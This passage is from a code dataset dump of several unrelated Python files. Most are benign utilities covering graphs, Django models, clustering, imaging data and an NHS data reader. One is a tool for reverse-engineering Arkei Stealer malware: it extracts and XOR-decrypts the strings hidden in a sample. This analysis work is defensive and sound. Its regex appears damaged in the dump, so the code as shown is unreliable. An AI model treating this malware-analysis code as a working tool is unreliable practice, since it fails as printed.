map(int, input().split())\n graph = Graph(nodes)\n for j in range(edges):\n p, n = map(int, input().split('-'))\n graph.add_edge(p, n)\n print(f'-- Graph --\\n{str(graph)}')\n for i in [0, 6, 3, 7]:\n print(f'-- BFS Traversal --\\n{graph.bfs_traversal(i)}')\n for i in [0, 6, 3, 7]:\n print(f'-- 
DFS Traversal --\\n{graph.dfs_traversal(i)}')\n\n","repo_name":"akashkw/practice","sub_path":"python/algos_ds/graph/graph.py","file_name":"graph.py","file_ext":"py","file_size_in_byte":2230,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"22479770871","text":"from django.db import models\nfrom django.core.validators import MinValueValidator\nfrom app_reference.models import Offices\nfrom django.contrib.auth.models import User\nfrom app_printers.models import Printers\nfrom django.db.models.signals import post_save\nfrom django.dispatch import receiver\n\n\nclass ID_Card(models.Model):\n card_type = models.CharField(\"Card Type\", max_length=200, unique=True)\n description = models.TextField(\"Description\")\n\n amount = models.PositiveIntegerField(\n \"Stock Amount\",\n validators=[MinValueValidator(0)]\n )\n\n class Meta:\n verbose_name = \"ID Card\"\n verbose_name_plural = \"ID Cards\"\n\n def __str__(self):\n return self.card_type\n\n\nclass Printer_Ribbon(models.Model):\n ribbon_type = models.CharField(\"Ribbon Type\", max_length=200, unique=True)\n description = models.TextField(\"Description\")\n\n amount = models.PositiveIntegerField(\n \"Stock Amount\",\n validators=[MinValueValidator(0)]\n )\n\n class Meta:\n verbose_name = \"Printer Ribbon\"\n verbose_name_plural = \"Printer Ribbons\"\n\n def __str__(self):\n return self.ribbon_type\n\n\nclass Active_Stocks(models.Model):\n card_type = models.ForeignKey(\n ID_Card, to_field=\"card_type\",\n on_delete=models.CASCADE\n )\n\n stock_name = models.CharField(\n \"Stock Name\",\n max_length=200,\n unique=True\n )\n\n office = models.ForeignKey(Offices, on_delete=models.CASCADE)\n\n description = models.TextField(\"Description\")\n\n amount = models.PositiveIntegerField(\n \"Stock Amount\",\n validators=[MinValueValidator(0)]\n )\n\n class Meta:\n verbose_name = \"Active Stock\"\n verbose_name_plural = \"Active Stocks\"\n\n def __str__(self):\n return self.stock_name\n\n\nclass UserProfile(models.Model):\n user = models.OneToOneField(User, on_delete=models.CASCADE)\n all_types = models.BooleanField('All ID Types', default=True)\n printer = models.ForeignKey(Printers, null=True, blank=True, on_delete=models.CASCADE)\n active_card = models.ForeignKey(Active_Stocks, null=True, blank=True, on_delete=models.CASCADE)\n\n class Meta:\n verbose_name = 'User Profile'\n verbose_name_plural = 'User Profiles'\n\n def __str__(self):\n return self.user.first_name\n\n\n@receiver(post_save, sender=User)\ndef create_user_profile(sender, instance, created, **kwargs):\n if created:\n UserProfile.objects.create(user=instance)\n\n\n@receiver(post_save, sender=User)\ndef save_user_profile(sender, instance, **kwargs):\n instance.userprofile.save()\n","repo_name":"mldvc/lazy-card","sub_path":"app_overview/models.py","file_name":"models.py","file_ext":"py","file_size_in_byte":2598,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"37303276897","text":"from flask_script import Manager\nfrom flask import Flask\nfrom db_script import DBManager\n\napp = Flask(__name__)\n\nmanager = Manager(app)\n\n\n@manager.command\ndef test():\n print(\"hello flask script\")\n\n\nmanager.add_command('db', DBManager)\n\nif __name__ == '__main__':\n 
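# --- Illustrative aside (not part of the original corpus file) ---
# With flask_script's Manager, each registered command becomes a CLI
# subcommand. Assuming this file is saved as 0409.py, invocation would look
# roughly like:
#   python 0409.py test        # runs the @manager.command function above
#   python 0409.py db <cmd>    # dispatches to the DBManager sub-manager
# (the exact DBManager subcommands live in db_script and are not shown here)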
manager.run()","repo_name":"DavidYusen/PythonCodes","sub_path":"Exercise/0409.py","file_name":"0409.py","file_ext":"py","file_size_in_byte":283,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"}
{"seq_id":"18984740045","text":"import numpy as np\nimport operator\nimport matplotlib.pyplot as plt\nfrom sklearn.cluster import KMeans\nfrom sklearn.cluster import DBSCAN\nfrom sklearn import datasets\nfrom sklearn import metrics\nfrom embeddings import read, plot_with_labels\nfrom sklearn.manifold import TSNE\n\n\ndef get_DBSCAN_clusters(vectors,labels): # group the vectors by their DBSCAN cluster label and store them in the dict clusters\n    clusters = {}\n    for i in range(len(labels)):\n        if labels[i] not in clusters:\n            clusters[labels[i]] = vectors[i]\n        elif labels[i] in clusters:\n            cur_vec = vectors[i]\n            cur_cluster = clusters[labels[i]]\n            clusters[labels[i]] = np.row_stack((cur_cluster, cur_vec))\n    return clusters\n\ndef get_centers(clusters): # get the center of each cluster (excluding the noise cluster)\n    centers = {}\n    for label in clusters:\n        if label == -1: # skip the noise cluster\n            continue\n        else:\n            cur_vectors = clusters[label]\n            km_model = KMeans(n_clusters=1, max_iter=500, random_state=0).fit(cur_vectors)\n            km_labels = km_model.labels_\n            km_score = metrics.calinski_harabaz_score(cur_vectors, km_labels)\n            print('K-means score for cluster label %d: %f' % (label, km_score))\n            cur_center = km_model.cluster_centers_\n            print('K-means center for cluster label %d: ' % label + str(cur_center))\n            centers[label] = cur_center\n    return centers\n\ndef get_distance(cur_vector, cur_center, method): # get the distance to the center (cosine similarity or Euclidean distance)\n    if method == 'cos':\n        num = float(np.dot(cur_vector, cur_center.T))\n        vec_norm = np.linalg.norm(cur_vector) * np.linalg.norm(cur_center)\n        cos = num / vec_norm\n        sim = 0.5 + 0.5 * cos # normalize to [0, 1]\n        return sim\n    elif method == 'ED':\n        dist = np.linalg.norm(cur_vector - cur_center)\n        return dist\n\ndef distance_sort(vectors, cur_center, method): # get {word vector: distance to center} sorted by distance to the center\n    distance_dict = {}\n    for vector in vectors:\n        distance = get_distance(vector, cur_center, method)\n        distance_dict[vector] = distance\n    sorted_distance = sorted(distance_dict.items(), key=operator.itemgetter(1))\n    sorted_distance_dict = dict(sorted_distance)\n    return sorted_distance_dict\n\ndef get_vectors(filename, word2ind, wordvecs, dim): # get the word vectors of all words in the test text\n    vectors = np.zeros((1, dim))\n    test_file = open(filename, 'r', encoding='utf-8')\n    for line in test_file.readlines():\n        curline_words = line.split(' ')\n        for word in curline_words:\n            if word == '\\n':\n                continue\n            elif word in word2ind:\n                cur_index = word2ind[word]\n                cur_vec = wordvecs[cur_index]\n                vectors = np.row_stack((vectors,cur_vec))\n    if len(vectors) > 1:\n        vectors = np.delete(vectors, 0, 0)\n    test_file.close()\n    return vectors\n\ndef get_most_label(test_vectors, clusters): # get the cluster containing the most words from the test text\n    class_vector = {}\n    for vector in test_vectors:\n        for label in clusters:\n            if vector in clusters[label]:\n                if label not in class_vector:\n                    class_vector[label] = vector\n                else:\n                    class_vector[label] = np.row_stack((class_vector[label], vector))\n                break\n    assert len(class_vector) > 0\n    class_vector = dict(sorted(class_vector.items(), key=operator.itemgetter(0)))\n    if len(class_vector) == 1:\n        most_label = -1\n        print('All word vectors are noise!')\n    else:\n        most_label = 0\n        most_num = class_vector[most_label].shape[0]\n        for label in class_vector:\n            if label == -1 or label == 0:\n                continue\n            else:\n                if class_vector[label].shape[0] > most_num:\n                    most_num = class_vector[label].shape[0]\n                    most_label = label\n    print('Cluster %d contains the most words in this document: %d words, %f%% of all words' % (most_label, most_num, most_num * 100.0 / test_vectors.shape[0]))\n    return most_label\n\ndef main():\n    embedding_file = open('../data/model/SE2010.vector', 'r', encoding='utf-8', errors='surrogateescape')\n    words, wordvecs = read(embedding_file, dtype=float)\n    word2ind = {word: i for i, word in enumerate(words)}\n    # vec2ind = {}\n    # i = 0\n    # for vector in wordvecs:\n    #     vec2ind[vector] = i\n    #     i += 1\n    # vec2ind = {vector: i for vector in wordvecs, for i in range(len(wordvecs))}\n    plot_only = 1000\n    db_model = DBSCAN(eps=1.79, min_samples=4).fit(wordvecs)\n    db_labels = db_model.labels_\n    n_clusters = len(set(db_labels)) - (1 if -1 in db_labels else 0)\n    print('Number of clusters (excluding noise): %d' % n_clusters)\n    ratio = len(db_labels[db_labels[:] == -1]) / len(db_labels)\n    print('Noise ratio: ' + str(ratio))\n    clusters = get_DBSCAN_clusters(wordvecs, db_labels)\n    centers = get_centers(clusters)\n    test_vectors = get_vectors('../data/SemEval2010/train_removed/C-41.txt', word2ind, wordvecs, wordvecs.shape[1])\n    most_label = get_most_label(test_vectors, clusters)\n    vector_distance = distance_sort(test_vectors, centers[most_label], 'ED')\n    top_k = 0\n    # for vector in vector_distance:\n    #     for cur_index in range(len(wordvecs)):\n    #         if wordvecs[cur_index] ==\n    #     cur_index = vec2ind[vector]\n    #     cur_word = wordvecs[cur_index]\n    #     top_k += 1\n    #     print('%d、%s' % (top_k, cur_word))\n    #     if top_k >= 10:\n    #         break\n\n\n\n\n    # sorted_distance_dict = distance_sort(clusters[label], centers[label], 'ED') # or cos\n\n    embedding_file.close()\n\n\n\n\nif __name__ == '__main__':\n    main()\n    # get_vectors('../data/SemEval2010/train_removed/C-41.txt')\n    # tsne = TSNE(perplexity=30, n_components=2, init='pca', n_iter=5000, method='exact')\n    # low_dim_embs = tsne.fit_transform(vectors)\n    # # low_dim_embs = tsne.fit_transform(vectors[:plot_only, :])\n    # print(low_dim_embs.shape)\n    # labels = [words[i] for i in range(vectors.shape[0])]\n    # plot_with_labels(low_dim_embs, db_labels, labels, '../data/DBSCAN_SE2010.png')\n    # embedding_file.close()\n\n    # X1, y1=datasets.make_circles(n_samples=5000, factor=.6,\n    #                              noise=.05)\n    # X2, y2 = datasets.make_blobs(n_samples=1000, n_features=2, centers=[[1.2,1.2]], cluster_std=[[.1]],\n    #                              random_state=9)\n    # X = np.concatenate((X1, X2))\n    # y_pred = [-1 for i in range(6000)]\n    # plt.scatter(X[:, 0], X[:, 1], marker='o',c=y_pred)\n    # plt.show()\n    # y_pred = KMeans(n_clusters=3, random_state=9).fit_predict(X)\n    # y_pred = DBSCAN(eps=0.1, min_samples=10).fit_predict(X)\n    # print(y_pred.shape)\n    # n_clusters_ = len(set(y_pred)) - (1 if -1 in y_pred else 0)\n    # print('Number of clusters: %d' % (n_clusters_))\n    # ratio = len(y_pred[y_pred[:] == -1]) / len(y_pred)\n    # print('Fraction of data considered noise: %d' % (ratio))\n    # plt.scatter(X[:, 0], X[:, 1], c=y_pred)\n    # plt.show()\n\n","repo_name":"NoteXYX/KeywordExtraction","sub_path":"useless/dbscan.py","file_name":"dbscan.py","file_ext":"py","file_size_in_byte":7214,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"}
{"seq_id":"1553238593","text":"import pandas as pd\nimport numpy as np\nimport os\nimport glob\nimport matplotlib.pyplot as plt\nfrom utils.processSuite2pOutput import correct_suite2p_outputs\n\n\nclass Run:\n\n    def __init__(self, summary, exp_id):\n        self.fishID = summary.fishlabel[exp_id]\n        self.runID = summary.run[exp_id]\n        self.date = summary.date[exp_id]\n        self.calciumIndicator = summary.calciumIndicator[exp_id]\n        self.stage = summary.stage[exp_id]\n        self.enucleated = summary.enucleated[exp_id]\n        self.frameRateSCAPE = summary.frameRateSCAPE[exp_id]\n        
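# --- Illustrative aside (not part of the original corpus file) ---
# Run.__init__ reads one row of an experiment summary via pandas attribute
# access (summary.<column>[exp_id]). A minimal stand-in summary, with made-up
# values, could look like this; the real summary table is loaded elsewhere.
import pandas as pd
demo_summary = pd.DataFrame({
    'fishlabel': ['fish1'], 'run': ['run01'], 'date': ['2020-01-01'],
    'frameRateSCAPE': [10.0], 'bad_frames': ['3,4,5'],
})
# the same parsing the constructor applies to the bad_frames column:
print([int(i) for i in demo_summary.bad_frames[0].split(',')])  # [3, 4, 5]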
self.frameRateBeh = summary.frameRateBeh[exp_id]\n        self.laserPower = summary.laserPower[exp_id]\n        self.suite2pAnalysis = summary.suite2pAnalysis[exp_id]\n        self.suite2pPath = summary.suite2pPath[exp_id]\n        self.savePath = summary.savePath[exp_id]\n        self.bad_frames = [int(i) for i in summary.bad_frames[exp_id].split(',')]\n\n        self.nPlanesAnalysed = np.nan\n        self.suite2pData = dict()\n\n    def load_behavior_df(self):\n        df_bout = pd.read_pickle(self.savePath + '/df_bout.pkl')\n        df_frame = pd.read_pickle(self.savePath + '/df_frame.pkl')\n\n        return df_bout, df_frame\n\n    def load_suite2p_outputs(self):\n        if self.suite2pAnalysis:\n\n            planesAnalysed = next(os.walk(self.suite2pPath))[1]\n\n            for i in planesAnalysed:\n                try:\n                    self.suite2pData[int(i)] = dict()\n                except ValueError:\n                    i = i.split('_')[-1]\n                try:\n                    self.suite2pData[int(i)]['F'] = np.load(self.suite2pPath + i + '/suite2p/plane0/F.npy',\n                                                            allow_pickle=True)\n                    self.suite2pData[int(i)]['Fneu'] = np.load(self.suite2pPath + i +\n                                                               '/suite2p/plane0/Fneu.npy', allow_pickle=True)\n                    self.suite2pData[int(i)]['spks'] = np.load(self.suite2pPath + i +\n                                                               '/suite2p/plane0/spks.npy', allow_pickle=True)\n                    self.suite2pData[int(i)]['stat'] = np.load(self.suite2pPath + i +\n                                                               '/suite2p/plane0/stat.npy', allow_pickle=True)\n                    ops = np.load(self.suite2pPath + i + '/suite2p/plane0/ops.npy', allow_pickle=True)\n                    self.suite2pData[int(i)]['ops'] = ops.item()\n                    self.suite2pData[int(i)]['iscell'] = np.load(self.suite2pPath + i +\n                                                                 '/suite2p/plane0/iscell.npy', allow_pickle=True)\n                    print('successfully loaded suite2p outputs for plane {} at location\n{}'.format(i,\n                                                                                                   self.suite2pPath + i))\n\n                    if not hasattr(self, 'nFramesSCAPE'):\n                        setattr(self, 'nFramesSCAPE', self.suite2pData[int(i)]['F'].shape[1])\n\n                except FileNotFoundError:\n                    print('No outputs found at this path:\n')\n                    print(self.suite2pPath + i)\n                    self.suite2pData[int(i)] = None\n\n        else:\n            print('No suite2p analysis set for this run.')\n            self.suite2pData = None\n\n    def correct_suite2p_outputs(self, plane):\n\n        F_corrected, cells = correct_suite2p_outputs(self.suite2pData[plane]['F'],\n                                                     self.suite2pData[plane]['iscell'],\n                                                     self.suite2pData[plane]['Fneu'])\n        self.suite2pData[plane]['F_corrected'] = F_corrected\n        self.suite2pData[plane]['cells'] = cells\n\n    def filter_f(self, plane, window=3):\n        filtered_f = np.zeros(self.suite2pData[plane]['F_corrected'].shape)\n        for cell in self.suite2pData[plane]['cells']:\n            trace = pd.Series(self.suite2pData[plane]['F_corrected'][cell])\n            filtered_f[cell,] = np.array(trace.interpolate().rolling(window=window, center=True).median())\n        self.suite2pData[plane]['F_corrected_filter'] = filtered_f\n\n    def define_midline_per_plane(self):\n        planes = list(self.suite2pData.keys()).copy()\n        planes.sort()\n        setattr(self, 'midline_lim', {})\n        for plane in planes:\n            plt.figure(figsize=(14, 10))\n            plt.title(plane)\n            vmax = np.percentile(self.suite2pData[plane]['ops']['meanImg'], 90)\n            plt.imshow(self.suite2pData[plane]['ops']['meanImg'], cmap='Greys', vmax=vmax)\n            try:\n                plt.plot([lim1[0], lim2[0]], [lim1[1], lim2[1]], '--o')\n            except UnboundLocalError:\n                pass\n            lim1, lim2 = plt.ginput(2)\n            self.midline_lim[plane] = (lim1, lim2)\n            plt.close()\n\n    def build_mean_image(self):\n        planes = list(self.suite2pData.keys()).copy()\n        planes.sort()\n        limits_crop = self.limits_crop\n        lim_sup = np.max(limits_crop['x_lim'])\n        y_size = self.suite2pData[planes[0]]['ops']['meanImg'].shape[1]\n        arrays = np.zeros((lim_sup, y_size, len(planes)))\n        for i, plane in enumerate(planes):\n            lims = 
list(limits_crop.loc[limits_crop['Unnamed: 0'] == plane, 'x_lim'])\n arrays[lims[0]:lims[1], :, i] = self.suite2pData[plane]['ops']['meanImg']\n output = np.mean(arrays, axis=2)\n setattr(self, 'mean_background', output)\n\n # def build_mean_image_sagittal(self):\n # planes = list(self.suite2pData.keys()).copy()\n # planes.sort()\n # limits_crop = self.limits_crop\n # lim_sup = np.max(limits_crop['x_lim'])\n # y_size = self.suite2pData[planes[0]]['ops']['meanImg'].shape[1]\n # arrays = np.zeros((lim_sup, y_size, len(planes)))\n # for i, plane in enumerate(planes):\n # lims = list(limits_crop.loc[limits_crop['Unnamed: 0'] == plane, 'x_lim'])\n # arrays[lims[0]:lims[1], :, i] = self.suite2pData[plane]['ops']['meanImg']\n # output = np.mean(arrays, axis=1)\n # setattr(self, 'mean_background', output)\n\n def assign_behavior_trace(self, df_frame):\n setattr(self, 'tail_angle', np.array(df_frame.Tail_angle).copy())\n\n def assign_time_indices(self):\n setattr(self, 'time_indices_bh', np.arange(len(self.tail_angle)) / self.frameRateBeh)\n setattr(self, 'time_indices_SCAPE', np.arange(self.nFramesSCAPE) / self.frameRateSCAPE)\n","repo_name":"wyartlab/Carbo-Tano_Lapoix_2023","sub_path":"SCAPE/utils/createExpClass.py","file_name":"createExpClass.py","file_ext":"py","file_size_in_byte":6532,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"26361263251","text":"from binascii import hexlify, unhexlify\nimport pefile\nimport regex as re\nimport argparse\nimport logging\nimport traceback\nimport os\n\ndef configure_logger(log_level):\n log_file = os.path.join(os.path.dirname(os.path.realpath(__file__)), 'arkei_decrypt.log')\n log_levels = {0: logging.ERROR, 1: logging.WARNING, 2: logging.INFO, 3: logging.DEBUG}\n log_level = min(max(log_level, 0), 3) #clamp to 0-3 inclusive\n logging.basicConfig(level=log_levels[log_level], \n format='%(asctime)s - %(name)s - %(levelname)-8s %(message)s',\n handlers=[\n logging.FileHandler(log_file, 'a'),\n logging.StreamHandler()\n ])\n\nclass Decryptor:\n \n def __init__(self, input_file, output_file=None):\n self.logger = logging.getLogger('Arkei Stealer String Decryptor Logger')\n self.input_file = input_file\n self.output_file = output_file\n self.regex = re.compile(rb'(\\x6A(?P.))(\\x68(?P....))(\\x68(?P....))', re.DOTALL)\n self.output_strings = []\n with open(self.input_file, 'rb') as fp:\n self.data = fp.read()\n\n def extract_key_ciphertext(self, key_addr, ciphertext_addr, ciphertext_length):\n \"\"\"\n Extract key and ciphertext and return\n \"\"\"\n key_addr = int.from_bytes(key_addr, \"big\")\n ciphertext_addr = int.from_bytes(ciphertext_addr, \"big\")\n ciphertext_length = int.from_bytes(ciphertext_length, \"big\")\n\n # PE File\n pe = pefile.PE(self.input_file, fast_load=False)\n # Extract Key Addr\n key_ptr = pe.get_offset_from_rva(key_addr - pe.OPTIONAL_HEADER.ImageBase)\n self.logger.debug(f'Found potential key ptr at {hex(key_ptr)}')\n # Extract Ciphertext Addr\n ct_ptr = pe.get_offset_from_rva(ciphertext_addr - pe.OPTIONAL_HEADER.ImageBase)\n self.logger.debug(f'Found potential ciphertext ptr at {hex(ct_ptr)}') \n\n # Extract key and ciphertext from ptr\n with open(self.input_file, 'rb') as fp:\n fp.seek(key_ptr, 0)\n key = fp.read(ciphertext_length)\n self.logger.debug(f'Found key: {hexlify(key)}')\n fp.seek(ct_ptr, 0)\n ciphertext = fp.read(ciphertext_length)\n self.logger.debug(f'Found ciphertext: {hexlify(ciphertext)}')\n return key, ciphertext\n\n def extract_strings(self):\n \"\"\"\n 
Extract ciphertext (hashes) and keys and perform decryption of strings in Arkei Stealer\n \"\"\"\n\n matches = list(self.regex.finditer(self.data))\n #print(matches)\n for match in matches:\n if not match.group('key'):\n self.logger.warning(f'No key: {match.groupdict()}')\n continue\n match_data = self.data[match.start():match.end()]\n # Extract Ciphertext Length\n ciphertext_length = bytes(reversed(match.group('len')))\n # Extract Key Addr\n key_addr = bytes(reversed(match.group('key')))\n # Extract Ciphertext Addr\n ciphertext_addr = bytes(reversed(match.group('ciphertext')))\n key, ciphertext = self.extract_key_ciphertext(key_addr, ciphertext_addr, ciphertext_length)\n \n # Xor Decrypt\n buf = bytearray(ciphertext)\n key = bytearray(key)\n for i in range(len(buf)):\n buf[i] ^= key[i%len(key)]\n try:\n print(buf.decode('ascii'))\n self.output_strings.append(buf.decode('ascii'))\n except:\n print(buf)\n self.output_strings.append(buf)\n continue\n\n def write_output(self):\n #Write output to a given file\n try:\n with open(self.output_file, 'w') as fp:\n for x in self.output_strings:\n fp.write(str(x))\n fp.write('\\n')\n except Exception as e:\n self.logger.critical(traceback.format_exc())\n \n\nif __name__ == '__main__':\n parser = argparse.ArgumentParser(description='Arkei Stealer String Decryptor')\n parser.add_argument('-f', '--file', action='store', dest='file',\n required=True, help='Path of file to decrypt strings')\n parser.add_argument('-o', '--outfile', action='store', dest='outfile',\n required=False, help='Path to write unpacked strings')\n parser.add_argument('-v', '--verbose', action='count', default=0, \n help='Increase verbosity. Can specify multiple times for more verbose output')\n args = parser.parse_args()\n configure_logger(args.verbose)\n decryptor = Decryptor(args.file, args.outfile)\n try:\n decryptor.extract_strings()\n if args.outfile:\n decryptor.write_output()\n except Exception as e:\n print(f'Exception processing {args.file}:')\n print(traceback.format_exc())\n \n","repo_name":"MuziSec/malware_scripts","sub_path":"arkei_stealer/decrypt.py","file_name":"decrypt.py","file_ext":"py","file_size_in_byte":4982,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"21"} +{"seq_id":"15611283673","text":"# Based on https://github.com/pydata/pandas-datareader/blob/master/pandas_datareader/wb.py\n\nimport warnings\n\nimport sqlite3\n\nimport pandas as pd\nimport numpy as np\n\nfrom pandas_datareader.base import _BaseReader\n# from pandas.compat import string_types\nfrom pandas import read_sql_query, DataFrame, read_csv\n\nimport requests\nimport lxml.html\nimport lxml.etree\n\nimport zipfile\n#The following fudge copes with Python 2 and Python 3\ntry:\n from StringIO import StringIO as zreader\nexcept ImportError:\n from io import BytesIO as zreader\n\nimport json\n\n#Need unique column names\n#https://stackoverflow.com/a/2837551/454773\ndef rename_duplicates( old ):\n seen = {}\n for x in old:\n if x in seen:\n seen[x] += 1\n yield \"%s_%d\" % (x, seen[x])\n else:\n seen[x] = 0\n yield x\n\n# This list of dataset codes was pulled from the NHS Digital Organisation\n# Data Service data downloads pages:\n# https://digital.nhs.uk/organisation-data-service/data-downloads\n\ndataset_codes = ['epraccur', 'etrust', 'eccg', 'eccgsite', 'epcmem', 'epracmem',\n 'egdpprac', 'egpcur', 'egparc', 'epracarc', 'ehospice',\n 'epharmacyhq', 'edispensary', 'enurse', 'epcdp', 'eabeydispgp',\n 'ecarehomehq', 'ecarehomesite', 'ecarehomesucc', 'ephp',\n 
'ephpsite', 'enonnhs', 'eprison', 'eschools', 'ejustice',\n 'ecare']\ndatatype_codes = ['gp-data', 'other-nhs', 'health-authorities',\n 'non-nhs', 'miscellaneous']\n\nimport pkg_resources\n\nJSON_FILE = pkg_resources.resource_filename('pd_datareader_nhs', 'data/nhsdigitalods.json')\njdata=json.load(open(JSON_FILE))\n\n\nclass NHSDigitalOrganisationDataServiceReader(_BaseReader):\n \"\"\"\n Download data series from NHS Digital's Organisation Data Service\n \n Parameters\n ----------\n datasets: NHS Digital ODS indicator string or list of strings\n taken from the filepath of the downloaded dataset.\n errors: str {'ignore', 'warn', 'raise'}, default 'warn'\n Country codes are validated against a hardcoded list. This controls\n the outcome of that validation, and attempts to also apply\n to the results from world bank.\n errors='raise', will raise a ValueError on a bad country code.\n \n Returns\n -------\n ``pandas`` DataFrame.\n \"\"\"\n \n def __init__(self, datasets=None, datatypes=None, sqlite3db='default.sqlite', errors='warn'):\n \n if datasets is None and datatypes is None:\n datatypes = datatype_codes\n \n if isinstance(datatypes, str):\n datatypes = [datatypes]\n if isinstance(datasets, str):\n datasets = [datasets]\n \n bad_datasets = np.setdiff1d(datasets, dataset_codes) if datasets is not None else []\n # Validate the input\n if len(bad_datasets) > 0:\n tmp = \", \".join(bad_datasets)\n if errors == 'raise':\n raise ValueError(\"Invalid dataset code(s): %s\" % tmp)\n if errors == 'warn':\n warnings.warn('Non-standard dataset '\n 'codes: %s' % tmp, UserWarning)\n \n bad_datatypes = np.setdiff1d(datatypes, datatype_codes) if datatypes is not None else []\n # Validate the input\n if len(bad_datatypes) > 0:\n tmp = \", \".join(bad_datatypes)\n if errors == 'raise':\n raise ValueError(\"Invalid datatype code(s): %s\" % tmp)\n if errors == 'warn':\n warnings.warn('Non-standard datatype '\n 'codes: %s' % tmp, UserWarning)\n\n self.datasets = datasets\n self.datatypes = datatypes\n self.errors = errors\n \n self._cached_datasets = {}\n self._cached_dataset_lookups = None\n \n self.dbname = sqlite3db\n if sqlite3db:\n self.sqlite3con = sqlite3.connect(self.dbname) \n self._setdb()\n \n self._sourceDatasets(False)\n \n def init(self):\n pass\n \n def _setdb(self):\n if self.sqlite3con and not self._dbtable_exists('dataset_date'):\n print(\"Setting up a new dataset_date table...\")\n DataFrame({'Dataset':dataset_codes,'Date':None}).to_sql(con=self.sqlite3con,\n name=\"dataset_date\",\n index=False)\n if isinstance(self._cached_dataset_lookups, DataFrame):\n self._updatedb('_cached_dataset_lookups', self._cached_dataset_lookups)\n for key in self._cached_datasets:\n self._updatedb(key, self._cached_datasets[key]) \n \n def _sourceDatasets(self, retval=True):\n lookupURLs=[\"https://digital.nhs.uk/services/organisation-data-service/data-downloads/gp-and-gp-practice-related-data\",\n \"https://digital.nhs.uk/services/organisation-data-service/data-downloads/other-nhs-organisations\",\n \"https://digital.nhs.uk/services/organisation-data-service/data-downloads/health-authorities-and-support-agencies\",\n \"https://digital.nhs.uk/services/organisation-data-service/data-downloads/non-nhs-organisations\",\n \"https://digital.nhs.uk/services/organisation-data-service/data-downloads/miscellaneous\"]\n \n data = DataFrame()\n\n for url in lookupURLs:\n #print(f'Looking up {url}...')\n # TO DO - should really handle exception better here, eg if there is no connection?\n try:\n 
txt=requests.get(url).text \n table = lxml.html.fromstring(txt)\n\n for row in table.xpath('//tr')[1:]:\n cells=row.xpath('td')\n if cells[1] is not None:\n dataURL=cells[1].xpath('a/@href')[0]\n #File contents\tFile\tDate uploaded\tQuarterly/Monthly\tAvailable in XML\tRole code\tAPI call\n data=pd.concat([data, DataFrame([{'Label':cells[0].text,\n 'Date':cells[2].text,\n 'Period':cells[3].text,\n 'Dataset':dataURL.split('/')[-1].split('.')[0],\n 'URL':dataURL,\n 'Type':url.split('/')[-1]}])])\n data = data.reset_index(drop=True)\n except:\n if self._dbtable_exists('_cached_dataset_lookups'):\n data = self.read_db(table = '_cached_dataset_lookups')\n else: warnings.warn(\"Couldn't scrape ODS data listing: {}\".format(url))\n \n # cache\n self._cached_dataset_lookups = data.copy()\n if self.sqlite3con and not self._dbtable_exists('_cached_dataset_lookups'):\n self._updatedb('_cached_dataset_lookups', self._cached_dataset_lookups)\n if not retval: return\n return data\n\n def get_datasets(self):\n \"\"\"Download information about all NHS Digital Organisation Data Service datasets\"\"\"\n \n if isinstance(self._cached_dataset_lookups, DataFrame):\n return self._cached_dataset_lookups.copy()\n return self._sourceDatasets()\n \n def search(self, string='GP', field='Dataset', case=False):\n \"\"\"\n Search available datasets from NHS Digital Organisation Data Service\n Parameters\n ----------\n string: string\n regular expression\n field: string\n Label, Period, Dataset, Type, Date\n See notes below\n case: bool\n case sensitive search?\n Notes\n -----\n The first time this function is run it will download and cache the full\n list of available datasets. Depending on the speed of your network\n connection, this can take time. Subsequent searches will use the cached\n copy, so they should be much faster.\n Label : code label for dataset\n Period: reporting period\n Dataset: title of dataset\n Date: reporting date\n Type: general category dataset is listed under\n \"\"\"\n datasets = self.get_datasets()\n data = datasets[field]\n idx = data.str.contains(string, case=case)\n out = datasets.loc[idx].dropna()\n return out\n\n def zipgrabber(self, url):\n ''' Grab a zip file from a URL '''\n r = requests.get(url)\n z = zipfile.ZipFile(zreader(r.content))\n return z\n\n def zipgrabberfile(self, url, f):\n ''' Grab a file by name from a zip file grabbed from a URL '''\n return self.zipgrabber(url).open(f)\n\n def zipfile(self, z, f):\n ''' Grab a file by name from an already grabbed zip file '''\n return z.open(f)\n\n def zipfilelist(self, z):\n ''' Return the names of files contained in a grabbed zip file '''\n return z.namelist()\n \n def read_db(self, q=None, table=None):\n return self._read_db(q, table)\n \n def _read_db(self, q=None, table=None):\n #Note that the db can be stale - should check against recently loaded _cached_dataset_lookups?\n if not self.sqlite3con: return DataFrame()\n if q is None and table is None:\n q=\"SELECT name FROM sqlite_master WHERE type='table'\"\n elif q is None:\n q=\"SELECT * FROM {tbl}\".format(tbl=table)\n return read_sql_query(q,self.sqlite3con)\n \n def _checkdbcopyiscurrent(self,table):\n if table !='_cached_dataset_lookups' and self._dbtable_exists(table):\n datadate = self._cached_dataset_lookups[self._cached_dataset_lookups['Dataset']==table].iloc[0]['Date']\n q=\"SELECT Date FROM dataset_date WHERE Dataset='{dataset}';\".format(dataset=table)\n dbdatadate=self.read_db(q).iloc[0]['Date']\n return datadate==dbdatadate\n return False\n \n def 
_updatedb(self,table=None, data=None):\n if not self.sqlite3con or not isinstance(data,DataFrame) or table is None: return\n con=self.sqlite3con\n data.to_sql(con=con, name=table, if_exists='replace',index=False)\n if table !='_cached_dataset_lookups' and table!='dataset_date':\n datadate=self._cached_dataset_lookups[self._cached_dataset_lookups['Dataset']==table].iloc[0]['Date']\n q=\"UPDATE dataset_date SET Date='{date}' WHERE Dataset='{dataset}';\".format(date=datadate, dataset=table)\n c = con.cursor()\n c.execute(q)\n con.commit()\n \n def _dbtable_exists(self,table=None):\n if not self.sqlite3con or table is None: return False\n q=\"SELECT name FROM sqlite_master WHERE type='table' AND name='{}'\".format(table)\n return True if len(self.read_db(q)) else False\n \n def cached(self):\n tmp=self.search(string='')\n return tmp[tmp['Dataset'].isin(self._cached_datasets.keys())]\n\n \n def read(self):\n return self._read()\n\n def _read(self):\n \n data = {}\n \n #Get a list of datasets for a particular datatype\n if self.datasets is None and self.datatypes is not None:\n datasets = []\n for dt in self.datatypes:\n datasets = datasets + 